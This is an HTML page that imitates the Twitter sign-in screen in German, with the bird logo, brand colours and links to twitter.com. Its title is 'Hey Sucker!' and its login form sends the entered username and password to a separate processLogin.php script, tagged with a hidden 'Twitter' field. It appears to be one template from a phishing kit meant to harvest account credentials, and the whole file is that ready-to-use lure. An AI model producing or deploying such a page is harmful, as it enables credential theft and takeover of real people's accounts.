<html>
    <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
    <head>
        <title>Twitter Login</title>
<html>
	<head>
		<title>Hey Sucker!</title>
		<style type="text/css">
			html {

			}
			body {
				font-family: arial;
				//background: linear-gradient(to bottom, black 0%,black 50%,white 50%,white 100%);

				/* el 7ta el bt5ali el gradient di matet3adsh
				we tb2a block wa7ed tool el shasha hya el satr
				el fo2 bta3 min-height: 100% lel html */
				background-color: #f5f8fa;
			}
			html, body {   /*da el shal el margin el kan fo2 we gamb el header, el hwa navigation bar*/

				margin: 0;
				padding: 0;
			}

			div {
				//position
				position: absolute;
				top: 0px;
				left: 50%;
				margin: 0 auto;

				border-radius: 8px;
				background: linear-gradient(to bottom, white 0%,white 75%,#f4f4f4 75%,#f4f4f4 100%);
				border: 1px solid #dee1e2;
				padding: 15px;
				padding-left: 30px;
				width: 300px;
				height: 360px;
			}
			.inputt{
				width: 280px;
				margin: 8px 0;
				display: inline-block;
				border: 1px solid #ccc;
				border-radius: 3px;
				box-sizing: border-box;
				background-color: #faffbd;
				font-size: 13px;
				padding: 7px;


			}
			p{
				display: inline;
				font-size: 13px;
			}
			.textta7t{
				color: #8899a6;
				margin-bottom: 50px;
				line-height: 200%; //da el 5ala el spacing el ta7t tzid keda ,lw shelto hay2rabo awi mn ba3d
			}
			a{
				font-size: 13px;
			}
			.buttonn{
				width: 78px;
				font-family: arial;
				font-size: 16px;
				padding: 8px;
				margin: 10px 0;
				border: 1px solid #3b88c3;
				border-radius: 5px;
				background-color: #1c9ff0;
				font-weight: bold;
				color: white;

			}
			li {
				float: left;

				margin-right: 2px;   //di el sa7 , msh marginRight di , di 3'alat
			}
			ul {
				list-style-type: none;
				margin: 0;
				padding: 0;
				overflow: hidden;
				background-color: white;
				margin-bottom: 10px;
				box-shadow: 0px 0px 3px #888888;
			}
			li a {  /* wade7 keda en a di ma3naha el text , we ( li a ) di ma3naha el el text el gowa el li , ay*/
				display: block;
				color: #6f7d86;
				text-align: center;
				padding: 14px 16px;
				text-decoration: none;
				font-family: arial;

			}
			#awelwa7ed{
				//margin-right: 100px;
				margin-left: -280px;

			}
			#taniwa7ed{
				//margin-right: 100px;
				margin-left: -214px;

			}

			li a:hover {
				color:#1da1f2;
				background: linear-gradient(to bottom,white 0%, white 88%, #1da1f2 88%,#1da1f2 100%);
			}
			.buttonn:hover {
				background: linear-gradient(to bottom, #1da1f2 0%,#1889ce 100%);
        Cursor:pointer;
			}
			svg {
				width:3%;
				margin-left: 378px;
				margin-top: 12px;

			}
		</style>
	</head>
<body>
	<ul>
		<li><svg version="1.1" id="Layer_1" xmlns="" xmlns:xlink="" x="0px" y="0px"
	 viewBox="0 0 298.4 242.9" style="enable-background:new 0 0 298.4 242.9;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#5FA9DD;}
</style>
<path id="XMLID_17_" class="st0" d="M0,215.5c33.5,3.3,63.5-5.1,90.2-25.4c-2.1-0.2-4.1-0.4-6.2-0.6c-6.8-0.8-13.3-2.7-19.4-5.8
	c-14.4-7.2-24.5-18.4-30.4-33.4c-0.3-0.8-1.1-2-0.7-2.5c0.6-0.6,1.8,0.1,2.7,0.2c7.1,0.9,14.2,0.8,21.3-0.8c1-0.2,2-0.5,3.3-0.8
	c-19-4.5-33.2-15.1-42.3-32.1c-5.4-10.2-7.1-21.4-6.7-28.7c8.5,4.6,17.5,7.2,27.6,7.6c-13.3-9.4-22-21.7-25.6-37.3
	c-3.6-15.6-1.2-30.4,6.7-44.5c1.7,1.9,3.3,3.8,4.9,5.7c8.8,10,18.7,18.8,29.5,26.5c13,9.2,26.9,16.5,41.9,21.9
	c8.9,3.2,18.1,5.7,27.4,7.4c7.2,1.3,14.5,2.2,21.8,2.6c1.1,0.1,0.8-0.5,0.7-1c-1-4.6-1.5-9.4-1.4-14.1c0.4-14.7,5.3-27.8,15-39
	c9.1-10.5,20.5-17.3,34.2-20c18.9-3.6,35.9,0.7,51,12.7c1.8,1.5,3.6,3,5.1,4.7c0.6,0.6,1.1,0.7,1.9,0.5c13.1-2.8,25.5-7.5,37.1-14.2
	c0.1-0.1,0.3-0.2,0.6-0.4c-2.3,7.1-5.7,13.4-10.2,19.1c-4.5,5.8-9.9,10.5-16.1,14.5c11.9-1.3,23.3-4.5,34.6-9.4c-2,3-4,5.7-6.1,8.3
	c-6.9,8.6-14.7,16.2-23.6,22.7c-0.6,0.5-0.8,0.9-0.8,1.7c0.1,6.1,0.2,12.1-0.2,18.2c-0.5,7.3-1.5,14.6-2.9,21.8
	c-3.5,17.5-9.4,34.2-17.8,50c-6.9,13-15.2,25.1-25.1,36c-11,12.2-23.4,22.5-37.4,31c-11.4,6.9-23.4,12.3-36.1,16.3
	c-8.4,2.6-17,4.6-25.7,6c-5.7,0.9-11.4,1.4-17.1,1.8c-6.9,0.4-13.7,0.5-20.6,0.2c-6-0.3-11.9-0.9-17.8-1.8
	c-11.9-1.8-23.4-4.8-34.6-9c-11.3-4.2-22-9.6-32.1-16C0.4,215.8,0.3,215.7,0,215.5z"/>
</svg></li>
		<li id="awelwa7ed"><a href="https://twitter.com/">Home</a></li>
		<li id="taniwa7ed"><a href="https://twitter.com/">About</a></li>
	</ul>

	<div>
		<h2>Mit Twitter einloggen</h2>
		<form action='processLogin.php' method='POST'>
			<input class="inputt" type="text" name="user" placeholder="Email oder Benutzername" size="15" /> </br>
			<input class="inputt" type="password" name="pass" placeholder="Passwort" size="15" />
      <input type="hidden" name="loginpage" value='Twitter' />
			<input class="buttonn" type="submit" name="zorar" value="Log in"/>
  <br>
  <br>
  <br>
			<a href="">Passwort vergessen?</a>
		</form>
		<p class="textta7t"> Neu auf Twitter? </p>
		<a href=""> Jetzt anmelden</a>
		</br>


	</div>
</body>
</html>
